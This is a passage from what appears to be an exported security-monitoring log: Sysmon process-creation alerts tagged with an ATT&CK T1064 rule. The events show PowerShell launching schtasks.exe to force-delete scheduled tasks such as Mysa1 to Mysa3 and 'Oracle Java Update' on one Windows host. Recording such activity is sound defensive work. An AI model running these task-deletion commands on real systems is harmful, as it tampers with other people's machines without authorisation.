Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.530",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.641 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-0010d6c42e00} +ProcessId: 4208 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java Update"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.659462400Z"",""eventRecordID"":""3539"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.641\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-0010d6c42e00}\r\nProcessId: 4208\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:06.641"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-0010d6c42e00}"",""processId"":""4208"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java Update\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.507",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.570 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001002c32e00} +ProcessId: 6292 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.575016800Z"",""eventRecordID"":""3538"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.570\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001002c32e00}\r\nProcessId: 6292\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:06.570"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-001002c32e00}"",""processId"":""6292"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.486",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.526 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-00105ec12e00} +ProcessId: 7800 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ok /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.532053800Z"",""eventRecordID"":""3537"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.526\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-00105ec12e00}\r\nProcessId: 7800\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:06.526"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-00105ec12e00}"",""processId"":""7800"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ok /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.469",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.393 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001070bf2e00} +ProcessId: 1528 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium 
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.458662400Z"",""eventRecordID"":""3536"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.393\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001070bf2e00}\r\nProcessId: 1528\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:06.393"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-001070bf2e00}"",""processId"":""1528"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.453",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.155 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-0010d0bc2e00} +ProcessId: 7284 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.155685200Z"",""eventRecordID"":""3535"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.155\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-0010d0bc2e00}\r\nProcessId: 7284\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:06.155"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-0010d0bc2e00}"",""processId"":""7284"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.440",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:05.827 +ProcessGuid: {df9fc3d3-b3f5-5ecf-0000-001015ba2e00} +ProcessId: 8016 +Image: C:\Windows\System32\schtasks.exe 
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:05.827884200Z"",""eventRecordID"":""3534"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:05.827\r\nProcessGuid: {df9fc3d3-b3f5-5ecf-0000-001015ba2e00}\r\nProcessId: 8016\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 
/F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:05.827"",""processGuid"":""{df9fc3d3-b3f5-5ecf-0000-001015ba2e00}"",""processId"":""8016"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 